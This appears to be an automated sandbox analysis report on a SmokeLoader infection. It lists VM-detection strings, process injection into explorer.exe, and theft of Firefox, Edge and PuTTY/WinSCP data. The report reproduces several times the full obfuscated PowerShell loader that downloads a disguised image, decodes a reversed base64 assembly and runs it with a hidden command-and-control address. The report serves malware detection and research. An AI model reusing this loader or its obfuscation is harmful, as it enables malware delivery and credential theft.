            Source: explorer.exe, 0000000C.00000000.1503645926.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
            Source: 53B.tmp.14.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: explorer.exe, 0000000C.00000000.1503645926.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: 53B.tmp.14.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: 53B.tmp.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: explorer.exe, 0000000C.00000000.1503056802.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: 53B.tmp.14.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: 53B.tmp.14.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: 53B.tmp.14.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: explorer.exe, 0000000C.00000000.1503645926.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
            Source: 53B.tmp.14.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: explorer.exe, 0000000C.00000000.1503645926.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
            Source: 53B.tmp.14.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: 53B.tmp.14.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000009013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 0000000C.00000000.1503645926.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
            Source: 53B.tmp.14.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: explorer.exe, 0000000C.00000000.1504447706.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_xU1
            Source: 53B.tmp.14.drBinary or memory string: dev.azure.comVMware20,11696492231j
            Source: 53B.tmp.14.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: 53B.tmp.14.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
            Source: explorer.exe, 0000000C.00000000.1503645926.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
            Source: 53B.tmp.14.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: explorer.exe, 0000000C.00000000.1503056802.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: 53B.tmp.14.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSystem information queried: CodeIntegrityInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00402920 LdrLoadDll,11_2_00402920
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_001616C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,18_2_001616C7
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A02198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,14_2_00A02198
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A01000 GetProcessHeap,RtlAllocateHeap,14_2_00A01000
            Source: C:\Users\user\AppData\Roaming\uahuajdMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Benign windows process drops PE files
            Source: C:\Windows\explorer.exeFile created: uahuajd.12.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 46.173.214.14 80Jump to behavior
            Yara detected Powershell download and execute
            Source: Yara matchFile source: amsi64_5128.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6292, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5128, type: MEMORYSTR
            Creates a thread in another existing process (thread injection)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread created: C:\Windows\explorer.exe EIP: 3131960Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\Windows\explorer.exeMemory written: PID: 2060 base: 10879C0 value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 6080 base: 7FF710072D10 value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 4656 base: 10879C0 value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 7140 base: 10879C0 value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 2508 base: 7FF710072D10 value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 2908 base: 10879C0 value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 3988 base: 7FF710072D10 value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 3916 base: 10879C0 value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 5144 base: 7FF710072D10 value: 90Jump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: B19008Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 10879C0Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 10879C0Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 10879C0Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 10879C0Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 10879C0Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe26_2_001B1016
            Source: C:\Windows\SysWOW64\explorer.exeCode function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe26_2_001B10A5
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$originaltext = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredtext = $originaltext -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = new-object system.net.webclient;$googleability = $unroyalist.downloaddata($vicegerents);$tuillette = [system.text.encoding]::utf8.getstring($googleability);$marischal = '<<base64_start>>';$botchedly = '<<base64_end>>';$uscher = $tuillette.indexof($marischal);$diffamed = $tuillette.indexof($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.length;$tetri = $diffamed - $uscher;$engagement = $tuillette.substring($uscher, $tetri);$admixture = -join ($engagement.tochararray() | foreach-object { $_ })[-1..-($engagement.length)];$satisfy = [system.convert]::frombase64string($admixture);$rivets = [system.reflection.assembly]::load($satisfy);$subtractions = [dnlib.io.home].getmethod('vai');$subtractions.invoke($null, @($restoredtext, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','taskname'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$originaltext = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredtext = $originaltext -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = new-object system.net.webclient;$googleability = $unroyalist.downloaddata($vicegerents);$tuillette = [system.text.encoding]::utf8.getstring($googleability);$marischal = '<<base64_start>>';$botchedly = '<<base64_end>>';$uscher = $tuillette.indexof($marischal);$diffamed = $tuillette.indexof($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.length;$tetri = $diffamed - $uscher;$engagement = $tuillette.substring($uscher, $tetri);$admixture = -join ($engagement.tochararray() | foreach-object { $_ })[-1..-($engagement.length)];$satisfy = [system.convert]::frombase64string($admixture);$rivets = [system.reflection.assembly]::load($satisfy);$subtractions = [dnlib.io.home].getmethod('vai');$subtractions.invoke($null, @($restoredtext, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','taskname'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"Jump to behavior
            Source: explorer.exe, 0000000C.00000000.1504332665.0000000004880000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1503363257.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1506729663.0000000009013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000000C.00000000.1503363257.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 0000000C.00000000.1503363257.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
            Source: explorer.exe, 0000000C.00000000.1503056802.0000000000C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
            Source: explorer.exe, 0000000C.00000000.1503363257.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A555EB cpuid 14_2_00A555EB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdQueries volume information: C:\Users\user\AppData\Roaming\uahuajd VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A02112 GetSystemTimeAsFileTime,_alldiv,wsprintfA,14_2_00A02112
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A02198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,14_2_00A02198
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected SmokeLoader
            Source: Yara matchFile source: 00000018.00000002.2523151456.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2908, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3988, type: MEMORYSTR
            Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.1527132881.0000000002881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.1526950876.0000000002860000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\c64980e6-c743-4793-ba4a-89f593d4eb16Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-walJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-walJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\2c8e5eea-375d-48a9-ad4c-be583ff1215dJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695562.2c8e5eea-375d-48a9-ad4c-be583ff1215d.health.jsonlz4Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\targeting.snapshot.jsonJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-walJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\372e391e-787d-40e8-8beb-44106d6c22f4Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\ExperimentStoreData.jsonJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\AlternateServices.txtJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\times.jsonJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\6786f292-c1be-4996-99cd-77aa855c1844Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\59bd13a9-8183-4ac7-8723-9621ae6d3748Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\pkcs11.txtJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\shield-preference-experiments.jsonJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695610.18a05d94-e006-440f-b702-3e398a280dbf.health.jsonlz4Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\f5c2d345-4cad-4c1a-a51d-15d682036066Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\2824c836-2afd-4a95-940b-ed2b991ba55dJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7b2ddd96-6d27-491a-a7e0-811ed320f1f0Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690337.3be89113-af2b-4b48-9c47-40ac1156f7a2.new-profile.jsonlz4Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\01e461df-d85d-4561-a852-205de2d67f32Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\18a05d94-e006-440f-b702-3e398a280dbfJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\SiteSecurityServiceState.txtJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695614.edd11145-a3b3-4ebf-ba7b-14b7ec08f19f.main.jsonlz4Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690340.2824c836-2afd-4a95-940b-ed2b991ba55d.event.jsonlz4Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\.metadata-v2Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7917ce80-55b3-46ca-99c2-70537bbb959aJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\58b46d46-b146-420f-81af-5b32c19a8aefJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\eventsJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\parent.lockJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\protections.sqliteJump to behavior
